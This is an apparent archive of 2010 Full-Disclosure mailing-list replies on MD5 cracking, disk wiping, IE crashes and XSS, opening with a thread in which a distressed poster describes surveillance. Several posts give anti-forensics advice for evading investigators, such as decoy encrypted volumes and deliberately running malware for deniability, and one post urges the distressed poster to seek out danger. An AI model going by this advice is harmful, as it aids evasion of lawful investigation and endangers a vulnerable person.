directed a very excellent screenplay version of the novel.

The best recommendation I can afford is to leave the country. If your
life has been ruined and your friends and family have been badgered
you have nothing to lose. Your personal and professional lives are
nil. Restart in a new country.

The second best recommendation is to adopt the 24/7 surveillance as a
sort of warm big-brother security blanket, intentionally insert
yourself in dangerous situations, the men who are watching you are
bound by law to intercede to save your life. Tell people that you're
being watched, make sure you have proof of surveillance so they don't
think you're crazy. Let them know that it's a farce, you've done
nothing wrong. You might find that you can attract certain types of
women by sharing your unique problem with them, I'd suggest you start
with the Yoga, new age groups full of bored household wives at your
local gym.


On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras  wrote:
> @Jonny - No, I meant that you should write books. My mistake. Obviously.
>
>
>
>
>
>
> On Fri, Feb 19, 2010 at 11:26 PM, Benji  wrote:
>> Where should I send the cheque so that the funds may be released?
>>
>> On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham 
>> wrote:
>>>
>>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>> man
>>>
>>> someone please help me
>>>
>>> On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham
>>>  wrote:
>>> >I mean to say, my life is being vivisected. They are pulling my
>>> >life apart in layers like string cheese.
>>> >
>>> >It's quite uncomfortable.
>>> >
>>> >On Fri, 19 Feb 2010 21:57:52 + "Thor (Hammer of God)"
>>> > wrote:
>>> >>Vivisected like string cheese?
>>> >>
>>> >>> -Original Message-
>>> >>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>>> >>> disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan
>>> >>Barningham
>>> >>> Sent: Friday, February 19, 2010 1:51 PM
>>> >>> To: full-disclosure@lists.grok.org.uk
>>> >>> Subject: Re: [Full-disclosure] Why
>>> >>>
>>> >>> -BEGIN PGP SIGNED MESSAGE-
>>> >>> Hash: SHA1
>>> >>>
>>> >>> Hello.
>>> >>>
>>> >>> I used to be online friends with a subject of an FBI
>>> >>investigation.
>>> >>>
>>> >>> (Not saying who for my safety)
>>> >>>
>>> >>> I suppose I could be of assistance in his arrest and
>>> >>prosecution,
>>> >>> however, they didn't approach me that way. They approached me
>>> >>years
>>> >>> after I changed my life, in a very heavy handed way. Steven
>>> >>Hatfill
>>> >>> like, but with local cops. (Clearly, I'm being ambiguous to
>>> >>protect
>>> >>> my anonymity)
>>> >>>
>>> >>> Add a little ambiguity and locals with hitlists against me from
>>> >>my
>>> >>> younger years, That's all it takes. In truth it's not just MIB,
>>> >>> it's local police back where I used to live.
>>> >>>
>>> >>> I'm not going to be arrested obviously, but the constant
>>> >>bullying,
>>> >>> harassment, surveillance, pretexts and entrapment attempts is
>>> >>mind-
>>> >>> numbing and painful. I'm not some bad guy. I feel so deeply
>>> >>hurt.
>>> >>>
>>> >>> FBI? Stories in specific? A provocateur sent to paint me like a
>>> >>> cyberterrorist.
>>> >>>
>>> >>> My life being vivisected like string cheese. My humble,
>>> >peaceful
>>> >>> lifestyle being sensationalised and scrutinized by ignorant
>>> >Jack
>>> >>> Baeur's and inept bureaucrats.
>>> >>>
>>> >>> My friends are terrified, it's like they have a knife to their
>>> >>> throat -- that is the one's that stook up for me and got
>>> >>> threatened. The more gullible one's comply like the milgrim
>>> >>> experiment and give oscar winning performances. Never knew my
>>> >>> innocuous life could be spun to make me look like a mobster.
>>> >>>
>>> >>> I just want to be left alone. I can't even make friends or
>>> >>> girlfriends because cops will just go to them and take them
>>> >from
>>> >>> me. I am an amicable man and I can't be free without them
>>> >>> threatening the one's I love and turning htem against me. I
>>> >feel
>>> >>so
>>> >>> hopeless
>>> >>>
>>> >>> I'm unsure if they can even articulate a legal reason to
>>> >justify
>>> >>> such harassment. But that's the power of a runaway fishing
>>> >>> expedition.
>>> >>>
>>> >>> I wish I could just sue those bastards. @#$!
>>> >>>
>>> >>> Appreciate your concern
>>> >>>
>>> >>> P.S. Any of you whitehats have an idea what I can do here?
>>> >>>
>>> >>> On Tue, 16 Feb 2010 15:43:46 + ja...@smithwaysecurity.com
>>> >>wrote:
>>> >>> >Hello,
>>> >>> >
>>> >>> >
>>> >>> >So why are the Feds or and homeland security up your ass so
>>> >>much.
>>> >>> >
>>> >>> >What is it you know they want you to keep quite about.
>>> >>> >
>>> >>> 

Re: [Full-disclosure] about jit and dep+aslr

[T Biehn]

Every client will render your internationalized version! Transparently!

On Fri, Feb 5, 2010 at 6:56 AM, Larry Seltzer  wrote:
> Full-Disclosure has been submitted to ISO as a discussion standard, requiring 
> English posting, but allowing for a subposting field with referrals to 
> internationalized versions
>
> Larry Seltzer
> Contributing Editor, PC Magazine
> larry_selt...@ziffdavis.com
> http://blogs.pcmag.com/securitywatch/
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Security
> Sent: Friday, February 05, 2010 6:33 AM
> To: full-disclosure@lists.grok.org.uk
> Cc: yuange1...@hotmail.com
> Subject: Re: [Full-disclosure] about jit and dep+aslr
>
> That looked like perfect English to me - even if it is not your native 
> language  (and btw : neither is mine...)
>
>
>
>
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of yuange
> Sent: vrijdag 5 februari 2010 11:59
> To: ravi.borgaon...@gmail.com; full-disclosure
> Subject: Re: [Full-disclosure] about jit and dep+aslr
>
> My native language is not English, if  Full-disclosure rejected the 
> non-English connection, I can opt out!
>
> 
> Date: Fri, 5 Feb 2010 10:28:46 +0100
> Subject: Re: [Full-disclosure] about jit and dep+aslr
> From: ravi.borgaon...@gmail.com
> To: yuange1...@hotmail.com
>
> dude,
>
> dont you know that we speak english on Full-Disclosure list.
>
> R
> 2010/2/5 yuange 
>
>  http://hi.baidu.com/yuange1975/blog/item/4e57c3c2474a183ee5dd3b58.html
> 
> 更多热辣资讯尽在新版MSN首页！ 立刻访问！
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> 
> 搜索本应是彩色的,快来体验新一代搜索引擎-必应,精美图片每天换哦! 立即试用！
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] anybody know good service for cracking md5?

[T Biehn]

Rainbowcrack-Online was doing precomp dictionary attacks in conjunct
with rainbowtables in 2k5.
The hype spike for RC tables was back in 2k4.

You're off by 5 years Christian.

-Travis

On Thu, Feb 4, 2010 at 7:21 AM, McGhee, Eddie  wrote:
> Are you serious? People have been using rainbow tables for years mate.. and
> they are rather widely used.. no need to replace useful with anything, the
> statement was plain wrong..
> 
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
> Sciberras
> Sent: 04 February 2010 12:06
> To: Anders Klixbull
> Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>
> FINE. Replace "useful" with "widely popular".
>
>
>
>
> On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull  wrote:
>>
>> lol they have been useful for years son
>> just because YOU never found a use for them doesn't mean noone else has :)
>>
>>
>> 
>> From: Christian Sciberras [mailto:uuf6...@gmail.com]
>> Sent: 4. februar 2010 13:00
>> To: Anders Klixbull
>> Cc: valdis.kletni...@vt.edu; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] anybody know good service for cracking md5?
>>
>> Uh, in the sense that they are finally becoming actually useful...
>>
>>
>>
>>
>>
>> On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull  wrote:
>>>
>>> seems to be cropping in?
>>> as far as know rainbow tables has been around for years...
>>>
>>>
>>> 
>>> From: full-disclosure-boun...@lists.grok.org.uk
>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
>>> Sciberras
>>> Sent: 3. februar 2010 23:02
>>> To: valdis.kletni...@vt.edu
>>> Cc: full-disclosure@lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] anybody know good service for cracking
>>> md5?
>>>
>>> Actually dictionary attacks seem to work quite well, especially for
>>> common users which typically use dictionary and/or well known passwords
>>> (such as the infamous "password").
>>> Another idea which seems to be cropping in, is the use of hash tables
>>> with a list of known passwords rather then dictionary approach.
>>> Personally, the hash table one is quite successful, consider that it
>>> targets password groups rather than a load of wild guesses.
>>>
>>> Cheers.
>>>
>>>
>>>
>>>
>>> On Wed, Feb 3, 2010 at 10:26 PM,  wrote:

 On Wed, 03 Feb 2010 23:42:07 +0300, Alex said:

 > i find some sites which says that they can brute md5 hashes and WPA
 > dumps
 > for 1 or 2 days.

 Given enough hardware and a specified md5 hash, one could at least
 hypothetically find an input text that generated that hash.  However,
 that
 may or may not be as useful as one thinks, as you wouldn't have control
 over
 what the text actually *was*.  It would suck if you were trying to crack
 a password, and got the one that was only 14 binary bytes long rather
 than
 the one that was 45 printable characters long. ;)

 Having said that, it would take one heck of a botnet to brute-force an
 MD5 has
 in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5
 would
 take on the order of 10**22 years.  If all 140 million zombied computers
 on the
 internet were trying 1 billion keys per second, that drops it down to
 10**16
 years or so - or about 10,000 times the universe has been around
 already.

 I suspect they're actually doing a dictionary attack, which has a good
 chance
 of succeeding in a day or two.


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Bipin.
I am familiar with LUKS (DMCRYPT), SecurStar's DCPP, TrueCrypt, PGP
Desktop, Windows EFS and all manners of configurations of those
products, including the hidden container features of DCPP and TC.

I am familiar with computer forensics, computer forensic methods, and
anti-forensics. Furthermore I have working knowledge of the various
one-way hashes, symmetric and asymmetric encryption algorithms.
Working knowledge of the various block-cipher modes and what the
differences are between them.

>From firsthand experience with the courts I am familiar with their
tool dependence and what they can and cannot grab and why.

>From simple logic it is plain to see that filling a drive with content
from wikipedia, some n-gram algorithm or other source would be
worthless. A waste of time and effort.

This is because a drive full of zeros, a drive full of random bits and
a drive full of random word garbage are equivalent.

Some obfuscating filesystem that does -not- use encryption is as
worthless as a generic F-S. If the content on your drive is worth
grabbing the investigating authorities can and will reverse engineer
it.

As everyone has told you, encrypt with a FDE product from the start or
simply wipe your drive to nulls or garbage.

If you are very paranoid use my solution of a hidden container
containing a VM that you use for anything 'private.' Make sure your
host OS has a ream of malware running on it preferably pointed to
non-existent C&C channels, or using PKI where which nobody has the
private key.

-Travis

On Wed, Jan 27, 2010 at 11:18 AM, Bipin Gautam  wrote:
> Really? How much do you know of computer forensics? Care to Double
> clicked a few forensic tools first
>
> I bring up this issue here because as you can see the laws are
> different in different country and at places just "possession" of a
> questionable content is a crime, without much analysis from where did
> it come from. Such a logic doesnt hold much water from a technical
> prospective, that is what i was trying to discuss. (but you were so
> much concerned about my english lol )
>
> We were talking on a NEW topic, But if truecrypt is all you know, then
> download truecrypt and add a "custom cascade of ciphers" to your
> truecrypt source code... so that your truecrypt hidden volume will be
> very hard to bruteforced with off the self tools (which is what most
> forensic examiners do, they are tool dependent).
>
> (i  wish to make fun of you, but maybe another email! ;)
>
>
> -bipin
>
>
> On 1/27/10, T Biehn  wrote:
>> You made the argument against youself; apparently you didn't comprehend the
>> points made in 90% of the on-topic responces to this thread.
>>
>> On Jan 27, 2010 9:34 AM, "Bipin Gautam"  wrote:
>>
>> McGhee & T Biehn !
>>
>> Thankyou for putting up your "best" argument sadly that is the
>> BEST technical thing you happen to pick. in this topic to
>> comment about
>>
>> -bipin
>>
>> On 1/27/10, McGhee, Eddie  wrote: > and also lol @
>> maybe USELESS, try making ...
>>
>>> mailto:bipin.gau...@gmail.com>> wrote: > > Enough
>> noise, Lets wrap up: > >...
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

You made the argument against youself; apparently you didn't comprehend the
points made in 90% of the on-topic responces to this thread.

On Jan 27, 2010 9:34 AM, "Bipin Gautam"  wrote:

McGhee & T Biehn !

Thankyou for putting up your "best" argument sadly that is the
BEST technical thing you happen to pick. in this topic to
comment about

-bipin

On 1/27/10, McGhee, Eddie  wrote: > and also lol @
maybe USELESS, try making ...

> mailto:bipin.gau...@gmail.com>> wrote: > > Enough
noise, Lets wrap up: > >...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

No you don't understand, your premise is shit. Research what's already being
done instead of trying to improve what you don't understand.

lol @ ddos.

On Jan 26, 2010 11:09 PM, "Bipin Gautam"  wrote:

Enough noise, Lets wrap up:

Someone said: "Forensics requires more than merely finding a phrase or
file on a hard drive - it requires establishing the context. If a
court accepts evidence without that context, then the defendant should
appeal on the basis of having an incompetent lawyer."

So, any evidence/broken-text/suspicious phrases etc found in a
computer "without meta-data" maybe USELESS... REMEMBER.


Having a normal OS with forensic signature ZERO would be a simple yet
powerful project. Programmers??? it isnt difficult work. few
months, 1 person project.

Worm defense is smart as well as deadlock at times, the prospective i
presented can be used as a FALLBACK at times.


Maybe something like Alice/chatterbox run through the
free/slack/etc... space of your 1 TB harddisk is a intellectual dDoS!

___ Full-Disclosure - We believe
in it. Charter: http:/...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Unknown malware? Infections recently deleted by A/V?

The realm of data ownership is ridiculous. If I run an wifi AP with
WEP or no auth, my router keeps no logs, and my computer is a host to
malware then I would imagine that I cannot be convicted of a computer
crime without verification by physical surveillance.

If given the choice by a lawyer between pleading guilty and receiving
a lenient punishment and pleading not-guilty to certain loss for
severe punishment in the face of 'irrefutable' evidence most people
will choose to plead guilty. Prosecutors, Lawyers, and defendants are
largely either ignorant or apathetic to the issues around proving
culpability in computer-crime.

And case law would back me up.

-Travis

On Tue, Jan 26, 2010 at 3:11 AM, Charles Skoglund
 wrote:
> This discussion is getting weirder and weirder. If an examiner finds
> evidence on YOUR computer / cell phone / usb disks / whatever, please do
> tell me how it's not necessarily yours? By claiming your computer has been
> hacked? You do know an examiner usually knows how to double-check your story
> for malicious code right? Or what are you guys talking about?
>
> My experience is that when I find the evidence, the person/s being
> investigated confesses quite rapidly.
>
> Cheers!
>
>
>
> On 1/26/10 4:31 AM, "Bipin Gautam"  wrote:
>
>> So to the point, the techniques of forensic examiners were flawed from
>> day one given that any text/evidence found on your computer is NOT
>> NECESSARILY yours! Does that break digital forensics?
>> oops.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

I should have brought up the increased density problem Valdis, excellent points.

-Travis

On Tue, Jan 26, 2010 at 1:26 PM,   wrote:
> On Tue, 26 Jan 2010 11:11:52 EST, T Biehn said:
>> Overwritten files require analysis with a 'big expensive machine.'
>
> Assuming a disk drive made this century, if the block has actually been
> overwritten with any data even *once*, it is basically unrecoverable using any
> available tech.
>
> Proof: In a decade of looking, I haven't found a *single* data-recovery outfit
> that claimed to recover from even a single overwrite.  Blown partition table?
> No problem. Metadata overwritten, data not? We can scavenge the blocks. Disk
> been in a fire? Flood? Run over by truck? Sure. We can go in and scavenge the
> individual intact bits with big expensive machines. Overwritten? .
>
> Seriously - lot of companies can recover data by reading the magnetic fields 
> of
> intact data.  But anybody know of one that claims it can recover actual
> over-writes, as opposed to "damn we erased it" or "damn the first part of the
> disk is toast"?
>
> No?  Nobody knows of one?  I didn't think so.
>
> 20 or 25 years ago, it may still have been feasible to use gear to measure the
> residual magnetism in the sidebands after an over-write.   However, those
> sidebands have shrunk drastically, as they are the single biggest problem when
> trying to drive densities higher.  You can't afford a sideband anymore - if
> you have one, it's overlapping the next bit.
>
> There *may* be some guys inside the spook agencies able to recover overwrites.
> But you don't need to worry about any evidence so recovered ever being used
> against you in a court of law - as then they'd have to admit they could do it.
> Just like in WWII we allowed the German U-boats to sink our convoys rather
> than let them figure out we had broken Enigma, they'll let the prosecution
> fail rather than admit where the data came from.
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Are you suggesting that consumer magnet-based storage solutions use
the same technology that the recovery machines use to store more than
one bit in what you consider a 'single bit location' ?
I think it would be cost and space prohibitive, not dependent on any algorithm.
If I'm thinking correctly, and I have no real idea how the recovery
process works, the recovery machines measure minute variance in the
analog magnetic signal directly pulled from the platters to figure out
what bits 'used' to be on the disk in that location. I sincerely doubt
that anything consumer accessible would be able to work with that. I
also doubt that it is exact, and protocols probably use probabilistic
methods for extraction of a given content; text for example.
Given a block of bits, the signal variance from 'clean' on those bits
(eg if never written) is x.
x is matched with a dictionary of known text.

Anyone know to confirm?

-Travis

On Tue, Jan 26, 2010 at 11:15 AM, Christian Sciberras  wrote:
> It would be a part of the algorithm, to make sure the overwritten file is
> readable. But if those machines get any smaller, I guess these would be the
> next generation of storage media take bluerays vs dvds for example.
>
>
>
>
> On Tue, Jan 26, 2010 at 5:11 PM, T Biehn  wrote:
>>
>> Overwritten files require analysis with a 'big expensive machine.'
>> I doubt they ever recover the full file.
>>
>> -Travis
>>
>> On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras 
>> wrote:
>> > I was thinking, since all this (reasonable) fuss on wiping a disk over
>> > 10
>> > times to ensure non-readability, how come we're yet very limited on
>> > space
>> > usage?
>> > If, for example, I overwrote a bitmap file with a text one, what stops
>> > the
>> > computer from recovering/storing both (without using additional space)?
>> > Just a couple curiosities of mine.
>> >
>> >
>> >
>> >
>> >
>> > On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>> >  wrote:
>> >>
>> >> > By the way, does somebody knows about the flash memory?
>> >> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >> >
>> >>
>> >> No, wear-leveling (done at the memory controller level) will
>> >> dynamically
>> >> re-map addresses on the actual flash chip to ensure a relatively
>> >> consistent number of write cycles across the entire drive.
>> >>
>> >> The only way to completely "wipe" a flash disk is with a hammer.
>> >>
>> >> Regards,
>> >>
>> >> Michael Holstein
>> >> Cleveland State University
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Overwritten files require analysis with a 'big expensive machine.'
I doubt they ever recover the full file.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras  wrote:
> I was thinking, since all this (reasonable) fuss on wiping a disk over 10
> times to ensure non-readability, how come we're yet very limited on space
> usage?
> If, for example, I overwrote a bitmap file with a text one, what stops the
> computer from recovering/storing both (without using additional space)?
> Just a couple curiosities of mine.
>
>
>
>
>
> On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>  wrote:
>>
>> > By the way, does somebody knows about the flash memory?
>> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >
>>
>> No, wear-leveling (done at the memory controller level) will dynamically
>> re-map addresses on the actual flash chip to ensure a relatively
>> consistent number of write cycles across the entire drive.
>>
>> The only way to completely "wipe" a flash disk is with a hammer.
>>
>> Regards,
>>
>> Michael Holstein
>> Cleveland State University
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Oh yeah, another note: If you use a chaining block cipher than you
only need to wipe the first block to make the rest of your data
unrecoverable. Most FDE's actually use a pw to decrypt the actual
decryption key, that block functions much the same, if you can wipe
that then the rest of the data is unusable.
Note, anyone who has pulled your key from memory via trojan or other
means at an earlier time will be able to recover your data unless the
first block of the stream has been wiped. This might be common
practice in sneak and peek routines.

-Travis

On Tue, Jan 26, 2010 at 11:04 AM, Christian Sciberras  wrote:
> I was thinking, since all this (reasonable) fuss on wiping a disk over 10
> times to ensure non-readability, how come we're yet very limited on space
> usage?
> If, for example, I overwrote a bitmap file with a text one, what stops the
> computer from recovering/storing both (without using additional space)?
> Just a couple curiosities of mine.
>
>
>
>
>
> On Tue, Jan 26, 2010 at 4:08 PM, Michael Holstein
>  wrote:
>>
>> > By the way, does somebody knows about the flash memory?
>> > Is zeroing a whole usb key enough to make the data unrecoverable?
>> >
>>
>> No, wear-leveling (done at the memory controller level) will dynamically
>> re-map addresses on the actual flash chip to ensure a relatively
>> consistent number of write cycles across the entire drive.
>>
>> The only way to completely "wipe" a flash disk is with a hammer.
>>
>> Regards,
>>
>> Michael Holstein
>> Cleveland State University
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Disk wiping -- An alternate approach?

[T Biehn]

Entropy vs zeros vs random content.

Plausible deniability will only be there if there is legitimate data
that looks like it's been used and the prosecutor cannot construe any
of your data as that used for wiping or otherwise obscuring the data
on your drive. If you don't have this you better request a trial by
judge rather than jury.

Now;
Your best solution is to use an exterior OS on FDE, then, in a TC
Hidden Disk container have a VM image that you use for 'hidden works.'
You can hand over your FDE's PW and location of TC disk including the
exterior password for great fed win.

-Travis

On Tue, Jan 26, 2010 at 10:08 AM, Michael Holstein
 wrote:
>
>> By the way, does somebody knows about the flash memory?
>> Is zeroing a whole usb key enough to make the data unrecoverable?
>>
>
> No, wear-leveling (done at the memory controller level) will dynamically
> re-map addresses on the actual flash chip to ensure a relatively
> consistent number of write cycles across the entire drive.
>
> The only way to completely "wipe" a flash disk is with a hammer.
>
> Regards,
>
> Michael Holstein
> Cleveland State University
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes

[T Biehn]

"Do you really want to be buying
an entire operating system from somebody who just admitted they can't even
produce a workable browser with all their resources?"

Valdis makes the novice assumption that people consider valuations of
this sort when buying the newest iteration of Microsoft products. The
idea that consumers would actually consider an alternative to what is
an effectively locked in platform is laughable. The suggestion that
they might find such a move to be of any relevance or impact on their
purchasing decision is insane.


On Wed, Jan 20, 2010 at 1:00 PM,   wrote:
> On Wed, 20 Jan 2010 10:38:34 EST, James Matthews said:
>
>> Why doesn't microsoft throw some of it's weight behind Mozilla and ditch IE
>> forever. It doesn't suit their image.
>
> Unfortunately, the PR doesn't work that way.  Do you really want to be buying
> an entire operating system from somebody who just admitted they can't even
> produce a workable browser with all their resources?
>
> (Note this works differently in the Linux world, where the kernel crew doesn't
> even pretend to write browsers, and the Firefox crew *just* does browsers, and
> somebody else *just* does OpenOffice, and distros (for the most part) just 
> worry
> about integration issues, and everybody only claims to do their little part
> well)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MouseOverJacking attacks

[T Biehn]

Hello MustLive!
Thanking you for taking a personal approach to all of your list admirers!

Prosperous futures abound!

A missive granted in thy honor sweet prince of XSS.

On Sun, Jan 17, 2010 at 4:33 PM, MustLive  wrote:
> Hello Travis!
>
> Thanks for your attention to my article about MouseOverJacking attacks.
>
>> If you read the HTML specification you can find all sorts of XSS
>> attack vectors that people just assumed would be redundant to write
>> entire articles on!
>
> Yes, I'm familiar with HTML specification (as web developer from beginning
> of 1999) and I know about different events in HTML. And as web security
> professional I know a lot of XSS vectors.
>
> Many of events in HTML are not widespread enough (or not usable enough) for
> XSS attacks to write entire articles about them, but such ones as onclick
> and onmouseover are those which worth entire articles. There were said a lot
> about attacks via onclick in 2008, so I decided to said about onmouseover in
> 2009 (because it worths it).
>
> P.S.
>
> Because Jeff is already in my blacklist, as I mentioned to the list, so in
> the future no need to send me his letters. If you'll decide to answer me,
> than write me directly.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> - Original Message - From: "T Biehn" 
> To: "Jeff Williams" 
> Cc: "MustLive" ;
> 
> Sent: Tuesday, January 05, 2010 4:53 PM
> Subject: Re: [Full-disclosure] MouseOverJacking attacks
>
>
>> Hey MustLive!
>> If you read the HTML specification you can find all sorts of XSS
>> attack vectors that people just assumed would be redundant to write
>> entire articles on!
>>
>> Here!
>> http://www.w3.org/TR/REC-html40/interact/scripts.html
>>
>> -Travis
>>
>> On Sun, Jan 3, 2010 at 10:29 PM, Jeff Williams 
>> wrote:
>>>
>>> Thanks for your wishes MustDie;
>>>
